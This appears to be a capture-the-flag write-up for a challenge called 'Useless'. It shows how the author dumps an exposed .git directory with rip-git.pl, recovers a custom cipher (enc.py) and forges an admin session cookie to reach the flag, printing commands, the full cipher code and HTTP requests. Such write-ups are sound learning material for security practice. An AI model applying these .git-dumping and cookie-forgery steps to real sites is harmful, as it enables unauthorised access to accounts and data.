# ▼▼▼Useless - 89pts (Misc:42/170=24.7%)▼▼▼ **This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)** `http://13.124.66.179` \--- **1.Understanding of the function** ・Create Account ・Login \--- **2.Information Gathering** 403 Responce at /.git/ ↓ ``` # perl rip-git.pl -v -u http://13.124.66.179/.git [i] Downloading git files from http://13.124.66.179/.git [i] Auto-detecting 404 as 200 with 3 requests [i] Getting correct 404 responses [i] Using session name: bjFqLEJf [d] found COMMIT_EDITMSG [d] found config [d] found description [d] found HEAD [d] found index [!] Not found for packed-refs: 404 Not Found [!] Not found for objects/info/alternates: 404 Not Found [!] Not found for info/grafts: 404 Not Found [d] found logs/HEAD [d] found objects/72/949062a18d1a23d392c87a1a6555cdddb83014 [d] found objects/ab/117952cf9db060c337dcb90e782171377eab0b [d] found refs/heads/master [i] Running git fsck to check for missing items Checking object directories: 100% (256/256), done. [i] Got items with git fsck: 0, Items fetched: 0 [!] No more items to fetch. That's it! Your branch is based on 'origin/master', but the upstream is gone. (use "git branch --unset-upstream" to fixup) ``` ↓ Get a file `readme.md` \--- `# git log` ↓ ``` commit ab117952cf9db060c337dcb90e782171377eab0b (HEAD -> master) Author: joonuree <[email protected]> Date: Thu Feb 1 20:09:25 2018 +0900 useless commit 72949062a18d1a23d392c87a1a6555cdddb83014 Author: joonuree <[email protected]> Date: Thu Feb 1 20:07:26 2018 +0900 ``` ↓ Let's rollback 72949062a18d1a23d392c87a1a6555cdddb83014 ↓ `# git reset --hard 72949062a18d1a23d392c87a1a6555cdddb83014` ↓ Get `readme.md` and ` enc.py` \--- `readme.md` ↓ ``` ## algorithm for session cookie ### Basic \- general user >> username + user IP \- **admin** >> admin + 127.0.0.1 ### example \- username : `codegate`, IP : `211.224.255.84` \- `codegate211.224.255.84` >> (encrypt) >> setting cookie ``` ↓ If I log in as admin and IP 127.0.0.1, I will get a flag. \--- ` enc.py` ↓ ``` #-*- coding: utf-8 -*- class Encrypt(): def __init__(self, iv=None, keystr=None): self.iv = "useles5@" self.keystr = "SUCK_7h15+4lG0_!" self.init_matrix = [] chunk1 = self.keystr[0:8] chunk2 = self.keystr[8:16] row = [] for i in range(0, 8): for j in range(0, 8): row.append(ord(chunk1[i]) ^ ord(chunk2[j])) self.init_matrix.append( row[0:8]) del row[:] def split(self, p_txt): chunk = [] if len(p_txt)%8 != 0: p_txt += "x" * (8 - len(p_txt)%8) for i in range(0, len(p_txt), 8 ): chunk.append(p_txt[i:i+8]) return chunk def change(self, p_txt): temp = [] result = [] p_chunk = self.split(p_txt) for i in range(0, len(p_chunk)): for j in range(0, 8): temp.append(ord(p_chunk[i][j])) result.append(temp[0:8]) del temp[:] return result def schedule(self, num): shift = [1, 2, 3, 2, 2, 1, 2, 3] temp = [] matrix = [] if num%2 == 0: for i in range(0, 8): for j in range(0, 8): temp.append(self.init_matrix[i][(8 - shift[i] + j)%8]) matrix.append(temp[0:8]) del temp[:] else: for i in range(0, 8): for j in range(0, 8): temp.append(self.init_matrix[i][(shift[i] + j)%8]) matrix.append(temp[0:8]) del temp[:] return matrix def round0(self, p_chunk, k_chunk): temp = [] temp.append(p_chunk[0] - 10 + k_chunk[0]) temp.append(p_chunk[1] ^ k_chunk[1]) temp.append(p_chunk[2] + k_chunk[2]) temp.append(p_chunk[3] % (k_chunk[3]+2) + 32) temp.append(p_chunk[4] * 2 - k_chunk[3] - 7) temp.append(p_chunk[5] - 11 - k_chunk[5]%13) temp.append(p_chunk[6] ^ k_chunk[6]) temp.append(p_chunk[7] * 5 / (k_chunk[7] + 5)) return temp def round1(self, p_chunk, k_chunk): temp = [] temp.append(p_chunk[0] - 11 + k_chunk[0]) temp.append(p_chunk[1] ^ (k_chunk[1])%5) temp.append(p_chunk[2] ^ k_chunk[2]) temp.append(p_chunk[3] % (k_chunk[3]+2) + 34) temp.append(p_chunk[4] - k_chunk[3] + 14) temp.append(p_chunk[5] ^ k_chunk[5]) temp.append(p_chunk[6] + 9 - k_chunk[6]) temp.append(p_chunk[7] + k_chunk[7]) return temp def round2(self, p_chunk, k_chunk): temp = [] temp.append(p_chunk[0] - 11 + k_chunk[0]) temp.append(p_chunk[1] ^ (k_chunk[1]) % 13) temp.append(p_chunk[2] + k_chunk[2] + 17) temp.append(p_chunk[3] ^ k_chunk[3]) temp.append(p_chunk[4] ^ k_chunk[4]) temp.append(p_chunk[5] - k_chunk[5] + 20) temp.append(p_chunk[6] / 3 % (k_chunk[6]+15)) temp.append(p_chunk[7] + k_chunk[7]) return temp def round3(self, p_chunk, k_chunk): temp = [] temp.append(p_chunk[0] + k_chunk[0]) temp.append(p_chunk[1] ^ k_chunk[1] - 15) temp.append(p_chunk[2] ^ k_chunk[2]) temp.append(p_chunk[3] + k_chunk[3]) temp.append(p_chunk[4] + k_chunk[3] - 33) temp.append(p_chunk[5] ^ k_chunk[5]) temp.append(p_chunk[6] + k_chunk[6] - 55) temp.append(p_chunk[7] + k_chunk[7]) return temp def round4(self, p_chunk, k_chunk): temp = [] temp.append(p_chunk[0] + k_chunk[0]) temp.append(p_chunk[1] + k_chunk[1] + 17) temp.append(p_chunk[2] ^ k_chunk[2]) temp.append(p_chunk[3] - k_chunk[3] + 20) temp.append(p_chunk[4] % (k_chunk[3]+2) - 34) temp.append(p_chunk[5] ^ k_chunk[5]) temp.append(p_chunk[6] + k_chunk[6]) temp.append(p_chunk[7] - 11 + k_chunk[7]) return temp def round5(self, p_chunk, k_chunk): temp = [] temp.append(p_chunk[0] / 6 % (k_chunk[0]+1)) temp.append(p_chunk[1] ^ k_chunk[1]) temp.append(p_chunk[2] - k_chunk[2] + 20) temp.append(p_chunk[3] - k_chunk[3] + 20) temp.append(p_chunk[4] % (k_chunk[3]+7) - 34) temp.append(p_chunk[5] + k_chunk[5]) temp.append(p_chunk[6] ^ k_chunk[6]) temp.append(p_chunk[7] + k_chunk[7]) return temp def round6(self, p_chunk, k_chunk): temp = [] temp.append(p_chunk[0] / 6 % (k_chunk[0]+7)) temp.append(p_chunk[1] + k_chunk[1]) temp.append(p_chunk[2] ^ k_chunk[2]) temp.append(p_chunk[3] - k_chunk[3] % 2 + 55) temp.append(p_chunk[4] % (k_chunk[3]+3) + 127) temp.append(p_chunk[5] ^ k_chunk[5]) temp.append(p_chunk[6] + k_chunk[6] % 3) temp.append(p_chunk[7] + 11 + k_chunk[7]) return temp def round7(self, p_chunk, k_chunk): temp = [] temp.append(p_chunk[0] + k_chunk[0]%30) temp.append(p_chunk[1] / (k_chunk[1]+1)) temp.append(p_chunk[2] % (k_chunk[2]+4) + 18) temp.append(p_chunk[3] ^ k_chunk[3]) temp.append(p_chunk[4] ^ k_chunk[4]) temp.append(p_chunk[5] / (k_chunk[5]+10) + 97) temp.append(p_chunk[6] + k_chunk[6]) temp.append(p_chunk[7] / 11 + k_chunk[7]) return temp def xor_calc(self, iv, chunk): result = [] for i in range(0, 8): result.append(iv[i] ^ chunk[i]) return result def encblock(self, chunk, num): rows = self.schedule(num) block = [] result = [] block.append(self.round0(chunk, rows[0])) block.append(self.round1(chunk, rows[1])) block.append(self.round2(chunk, rows[2])) block.append(self.round3(chunk, rows[3])) block.append(self.round4(chunk, rows[4])) block.append(self.round5(chunk, rows[5])) block.append(self.round6(chunk, rows[6])) block.append(self.round7(chunk, rows[7])) if num%2 == 0: result.append(chunk[0]^block[0][1]^block[1][2]^block[2][3]) result.append(chunk[1]^block[0][1]^block[1][2]^block[3][2]) result.append(chunk[2]^block[0][1]^block[2][3]^block[3][2]) result.append(chunk[3]^block[1][2]^block[2][3]^block[3][2]) result.append(chunk[4]^block[4][2]^block[5][1]^block[6][2]) result.append(chunk[5]^block[4][2]^block[5][1]^block[7][3]) result.append(chunk[6]^block[4][2]^block[6][2]^block[7][3]) result.append(chunk[7]^block[5][1]^block[6][2]^block[7][3]) else: result.append(chunk[0]^block[0][6]^block[1][5]^block[2][4]) result.append(chunk[1]^block[0][6]^block[1][5]^block[3][5]) result.append(chunk[2]^block[0][6]^block[2][4]^block[3][5]) result.append(chunk[3]^block[1][5]^block[2][4]^block[3][5]) result.append(chunk[4]^block[4][5]^block[5][6]^block[6][5]) result.append(chunk[5]^block[4][5]^block[5][6]^block[7][4]) result.append(chunk[6]^block[4][5]^block[6][5]^block[7][4]) result.append(chunk[7]^block[5][6]^block[6][5]^block[7][4]) return result def encrypt(self, plaintxt): p_chunks = self.change(plaintxt) e_chunks = [] for i in range(0, len(p_chunks)): if i == 0: xor = (self.change(self.iv)[0]) temp = self.xor_calc(xor, p_chunks[i]) e_chunks.append(self.encblock(temp, i)) del xor[:] del temp[:] xor.extend(e_chunks[i]) enctxt = "" for i in range(0, len(e_chunks)): for j in range(0, 8): enctxt += chr(e_chunks[i][j]) return enctxt.encode('hex') ``` ↓ It is Encrypt Class file written in python. \--- At the end of enc.py, I wrote the following code. ↓ ``` e = Encrypt() print e.encrypt('admin127.0.0.1') ``` ↓ ``` # python enc.py 7e787c68293431367f6d63236f36694a ``` ↓ Get a useless_session_id of admin!! \--- ``` GET / HTTP/1.1 Host: 13.124.66.179 Cookie: useless_session_id=7e787c68293431367f6d63236f36694a ``` ↓ Response ``` * admin * flag ``` ↓ ``` GET /flag_6c98a6487611dd8d3adfa25d7f41cfed HTTP/1.1 Host: 13.124.66.179 Cookie: useless_session_id=7e787c68293431367f6d63236f36694a ``` ↓ ```

FLAG

Suck Algorithm! It has duplicated keys, So Useless :p

Encrypt the below plain text in { } with key, and Auth IT!

ENCRYPTME{It's_reaLLy_n0nsen5_th4t_I_5p3nt_M0ney_more_7h4n_My_6udg3t.}

Thank you for solving, please enjoy other challenges! :)

``` ↓ ENCRYPTME{It's_reaLLy_n0nsen5_th4t_I_5p3nt_M0ney_more_7h4n_My_6udg3t.} \--- At the end of enc.py, I wrote the following code. ``` e = Encrypt() print e.encrypt("It's_reaLLy_n0nsen5_th4t_I_5p3nt_M0ney_more_7h4n_My_6udg3t.") ``` ↓ ``` # python enc.py 1678766808377c204d4a062d550c536f3d783868306d262550154b6129702f485378396821494c52171e695d4f16493c79783f681f4e1c411b045e0b227b2443 ``` ↓ Get a flag!!https://github.com/Super- Guesser/ctf/tree/master/Fword%20CTF%202020/writeups/useless Original writeup (https://github.com/Super- Guesser/ctf/tree/master/Fword%20CTF%202020/writeups/useless).